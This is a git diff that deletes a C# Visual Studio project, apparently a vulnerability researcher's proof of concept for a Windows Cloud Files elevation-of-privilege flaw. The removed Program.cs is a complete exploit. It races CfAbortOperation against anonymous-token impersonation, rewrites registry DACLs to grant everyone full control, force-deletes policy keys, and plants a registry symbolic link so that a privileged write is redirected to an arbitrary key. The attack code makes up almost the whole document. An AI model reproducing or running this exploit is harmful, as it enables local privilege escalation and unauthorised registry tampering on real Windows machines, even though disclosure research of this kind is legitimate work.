diff --git a/src/PoC_AbortHydration_ArbitraryRegKey_EoP.sln b/src/PoC_AbortHydration_ArbitraryRegKey_EoP.sln
deleted file mode 100644
index e387198..0000000
--- a/src/PoC_AbortHydration_ArbitraryRegKey_EoP.sln
+++ /dev/null
@@ -1,25 +0,0 @@
-
-Microsoft Visual Studio Solution File, Format Version 12.00
-# Visual Studio Version 16
-VisualStudioVersion = 16.0.30413.136
-MinimumVisualStudioVersion = 10.0.40219.1
-Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PoC_AbortHydration_ArbitraryRegKey_EoP", "PoC_AbortHydration_ArbitraryRegKey_EoP\PoC_AbortHydration_ArbitraryRegKey_EoP.csproj", "{352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}"
-EndProject
-Global
- GlobalSection(SolutionConfigurationPlatforms) = preSolution
- Debug|Any CPU = Debug|Any CPU
- Release|Any CPU = Release|Any CPU
- EndGlobalSection
- GlobalSection(ProjectConfigurationPlatforms) = postSolution
- {352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
- {352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}.Debug|Any CPU.Build.0 = Debug|Any CPU
- {352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}.Release|Any CPU.ActiveCfg = Release|Any CPU
- {352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}.Release|Any CPU.Build.0 = Release|Any CPU
- EndGlobalSection
- GlobalSection(SolutionProperties) = preSolution
- HideSolutionNode = FALSE
- EndGlobalSection
- GlobalSection(ExtensibilityGlobals) = postSolution
- SolutionGuid = {AC46CFC5-1E96-44EF-8DC8-8D76B107B781}
- EndGlobalSection
-EndGlobal
diff --git a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/App.config b/src/PoC_AbortHydration_ArbitraryRegKey_EoP/App.config
deleted file mode 100644
index 5754728..0000000
--- a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/App.config
+++ /dev/null
@@ -1,6 +0,0 @@
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/PoC_AbortHydration_ArbitraryRegKey_EoP.csproj b/src/PoC_AbortHydration_ArbitraryRegKey_EoP/PoC_AbortHydration_ArbitraryRegKey_EoP.csproj
deleted file mode 100644
index 82dafa4..0000000
--- a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/PoC_AbortHydration_ArbitraryRegKey_EoP.csproj
+++ /dev/null
@@ -1,59 +0,0 @@
-
-
-
-
- Debug
- AnyCPU
- {352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}
- Exe
- PoC_AbortHydration_ArbitraryRegKey_EoP
- PoC_AbortHydration_ArbitraryRegKey_EoP
- v4.7.2
- 512
- true
- true
-
-
- AnyCPU
- true
- full
- false
- bin\Debug\
- DEBUG;TRACE
- prompt
- 4
- false
-
-
- AnyCPU
- pdbonly
- true
- bin\Release\
- TRACE
- prompt
- 4
- false
-
-
-
- ..\packages\NtApiDotNet.1.1.28\lib\net45\NtApiDotNet.dll
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/Program.cs b/src/PoC_AbortHydration_ArbitraryRegKey_EoP/Program.cs
deleted file mode 100644
index 9429502..0000000
--- a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/Program.cs
+++ /dev/null
@@ -1,267 +0,0 @@
-using NtApiDotNet;
-using NtApiDotNet.Win32;
-using System;
-using System.Runtime.InteropServices;
-using System.Threading;
-
-namespace PoC_AbortHydration_ArbitraryRegKey_EoP
-{
- static class Program
- {
- static NtKey OpenKey(NtKey root, string path, KeyAccessRights desired_access)
- {
- Console.WriteLine("Opening for {0}", desired_access);
- using (var obja = new ObjectAttributes(path, AttributeFlags.OpenLink, root))
- {
- using (var key = NtKey.Open(obja, desired_access, KeyCreateOptions.NonVolatile, false))
- {
- if (key.IsSuccess)
- return key.Result.Duplicate();
- }
-
- using (var imp = NtThread.Current.ImpersonateAnonymousToken())
- {
- return NtKey.Open(obja, desired_access, KeyCreateOptions.NonVolatile);
- }
- }
- }
-
- static void SetSecurityDescriptor(NtKey key, SecurityInformation info)
- {
- var sd = new SecurityDescriptor("D:(A;OICIIO;GA;;;WD)(A;OICIIO;GA;;;AN)(A;;GA;;;WD)(A;;GA;;;AN)S:(ML;OICI;NW;;;S-1-16-0)");
- key.SetSecurityDescriptor(sd, info);
- }
-
- static void ForceKeyDeleteKey(NtKey root, string name)
- {
- Console.WriteLine(@"Deleting {0}\{1}", root.FullPath, name);
- using (var key = OpenKey(root, name, KeyAccessRights.WriteDac))
- {
- Console.WriteLine("Opened for WriteDac");
- SetSecurityDescriptor(key, SecurityInformation.Dacl);
- }
-
- using (var key = OpenKey(root, name, KeyAccessRights.WriteOwner))
- {
- Console.WriteLine("Opened for WriteOwner");
- SetSecurityDescriptor(key, SecurityInformation.Label);
- }
-
- using (var new_key = OpenKey(root, name, KeyAccessRights.Delete | KeyAccessRights.EnumerateSubKeys))
- {
- Console.WriteLine("Opened for enumerate.");
- DeleteRegistryTree(new_key);
- new_key.Delete();
- }
- }
-
- static void DeleteRegistryTree(NtKey root)
- {
- foreach (var name in root.QueryKeys())
- {
- ForceKeyDeleteKey(root, name);
- }
- }
-
- [Flags]
- enum AbortHydrationFlags
- {
- None = 0,
- Unblock = 1,
- Block = 2,
- }
-
- [DllImport("cldapi.dll", CharSet = CharSet.Unicode)]
- static extern int CfAbortOperation(int pid, IntPtr unknown, AbortHydrationFlags flags);
-
- [StructLayout(LayoutKind.Sequential)]
- struct CF_PLATFORM_INFO
- {
- public int BuildNumber;
- public int RevisionNumber;
- public int IntegrationNumber;
- }
-
- [DllImport("cldapi.dll", CharSet = CharSet.Unicode)]
- static extern int CfGetPlatformInfo(
- out CF_PLATFORM_INFO PlatformVersion
- );
-
- static void ForceTokenThread(object obj)
- {
- try
- {
- using (var thread = (NtThread)obj)
- {
- Console.WriteLine("In force token thread {0}", thread);
- using (var token = TokenUtils.GetAnonymousToken())
- {
- while (true)
- {
- thread.SetImpersonationToken(token);
- thread.SetImpersonationToken(null);
- }
- }
- }
- }
- catch(ThreadAbortException)
- {
- return;
- }
- catch (Exception ex)
- {
- Console.WriteLine(ex);
- }
- }
-
- const string ROOT_KEY = @"\Registry\User\.DEFAULT\Software\Policies\Microsoft";
- static string CLOUD_FILES = $@"{ROOT_KEY}\CloudFiles";
- static string BLOCKED_APPS = $@"{CLOUD_FILES}\BlockedApps";
- const string TARGET_KEY = @"\Registry\User\.DEFAULT\DEMODEMO";
-
- static void CheckKeyThread(object root_key)
- {
- string path = (bool)root_key ? ROOT_KEY : @"\Registry\User\.DEFAULT";
- try
- {
- using (var key = NtKey.Open(path, null, KeyAccessRights.MaximumAllowed))
- {
- while (true)
- {
- if (key.NotifyChange(NotifyCompletionFilter.Name, true) == NtStatus.STATUS_NOTIFY_ENUM_DIR)
- {
- Console.WriteLine("Change detected.");
- Environment.Exit(0);
- break;
- }
- }
- }
- }
- catch (Exception ex)
- {
- Console.WriteLine(ex);
- }
- }
-
- static int Check(this int hr)
- {
- if (hr < 0)
- Marshal.ThrowExceptionForHR(hr);
- return hr;
- }
-
- const int MAX_STAGE = 4;
-
- static void Stage0()
- {
- for (int i = 1; i < MAX_STAGE; ++i)
- {
- Win32ProcessConfig config = new Win32ProcessConfig
- {
- CommandLine = $"run {i}",
- ApplicationName = typeof(Program).Assembly.Location,
- TerminateOnDispose = true
- };
-
- using (var p = Win32Process.CreateProcess(config))
- {
- if (p.Process.Wait(10) != NtStatus.STATUS_SUCCESS)
- {
- throw new ArgumentException($"Failed to run stage {i}");
- }
- }
- }
- }
-
- static void Stage1(bool root_key)
- {
- Thread check_key_th = new Thread(CheckKeyThread);
- check_key_th.IsBackground = true;
- check_key_th.Start(root_key);
- Thread.Sleep(1000);
-
- var th = NtThread.OpenCurrent();
- var anon_thread = new Thread(ForceTokenThread)
- {
- IsBackground = true
- };
- anon_thread.Start(th);
-
- while (true)
- {
- CfAbortOperation(NtProcess.Current.ProcessId,
- IntPtr.Zero, AbortHydrationFlags.Block);
- }
- }
-
- static void Stage2()
- {
- using (var key = OpenKey(null, CLOUD_FILES, KeyAccessRights.WriteDac | KeyAccessRights.WriteOwner | KeyAccessRights.EnumerateSubKeys))
- {
- SetSecurityDescriptor(key, SecurityInformation.Dacl | SecurityInformation.Label);
- DeleteRegistryTree(key);
- }
-
- NtKey.CreateSymbolicLink(BLOCKED_APPS, null, TARGET_KEY);
- Stage1(false);
- }
-
- static void Stage3()
- {
- using (var key = OpenKey(null, BLOCKED_APPS, KeyAccessRights.Delete))
- {
- Console.WriteLine("Cleaning up link {0}", key.FullPath);
- key.Delete();
- }
-
- using (var key = OpenKey(null, TARGET_KEY, KeyAccessRights.WriteDac | KeyAccessRights.WriteOwner))
- {
- SetSecurityDescriptor(key, SecurityInformation.Dacl | SecurityInformation.Label);
- }
- }
-
- static void Main(string[] args)
- {
- try
- {
- CfGetPlatformInfo(out CF_PLATFORM_INFO _).Check();
-
- if (args.Length <= 1)
- {
- int stage = args.Length > 0 ? int.Parse(args[0]) : 0;
- switch (stage)
- {
- case 0:
- Stage0();
- break;
- case 1:
- Stage1(true);
- break;
- case 2:
- Stage2();
- break;
- case 3:
- Stage3();
- break;
- default:
- throw new ArgumentException("Erm?");
- }
- }
- else
- {
- using (var token = TokenUtils.GetLogonUserToken(args[0], "", args[1], SecurityLogonType.Network, null))
- {
- using (var imp = token.Impersonate())
- {
- CfAbortOperation(NtProcess.Current.ProcessId, IntPtr.Zero, AbortHydrationFlags.Block).Check();
- }
- }
- }
- }
- catch (Exception ex)
- {
- Console.WriteLine(ex);
- }
- }
- }
-}
diff --git a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/Properties/AssemblyInfo.cs b/src/PoC_AbortHydration_ArbitraryRegKey_EoP/Properties/AssemblyInfo.cs
deleted file mode 100644
index 6e2483f..0000000
--- a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/Properties/AssemblyInfo.cs
+++ /dev/null
@@ -1,36 +0,0 @@
-using System.Reflection;
-using System.Runtime.CompilerServices;
-using System.Runtime.InteropServices;
-
-// General Information about an assembly is controlled through the following
-// set of attributes. Change these attribute values to modify the information
-// associated with an assembly.
-[assembly: AssemblyTitle("PoC_AbortHydration_ArbitraryRegKey_EoP")]
-[assembly: AssemblyDescription("")]
-[assembly: AssemblyConfiguration("")]
-[assembly: AssemblyCompany("")]
-[assembly: AssemblyProduct("PoC_AbortHydration_ArbitraryRegKey_EoP")]
-[assembly: AssemblyCopyright("Copyright © 2020")]
-[assembly: AssemblyTrademark("")]
-[assembly: AssemblyCulture("")]
-
-// Setting ComVisible to false makes the types in this assembly not visible
-// to COM components. If you need to access a type in this assembly from
-// COM, set the ComVisible attribute to true on that type.
-[assembly: ComVisible(false)]
-
-// The following GUID is for the ID of the typelib if this project is exposed to COM
-[assembly: Guid("352f6dd7-9b05-4896-9e7d-2efa36eac6e3")]
-
-// Version information for an assembly consists of the following four values:
-//
-// Major Version
-// Minor Version
-// Build Number
-// Revision
-//
-// You can specify all the values or you can default the Build and Revision Numbers
-// by using the '*' as shown below:
-// [assembly: AssemblyVersion("1.0.*")]
-[assembly: AssemblyVersion("1.0.0.0")]
-[assembly: AssemblyFileVersion("1.0.0.0")]
diff --git a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/packages.config b/src/PoC_AbortHydration_ArbitraryRegKey_EoP/packages.config
deleted file mode 100644
index f78d31a..0000000
--- a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/packages.config
+++ /dev/null
@@ -1,4 +0,0 @@
-
-
-
-
\ No newline at end of file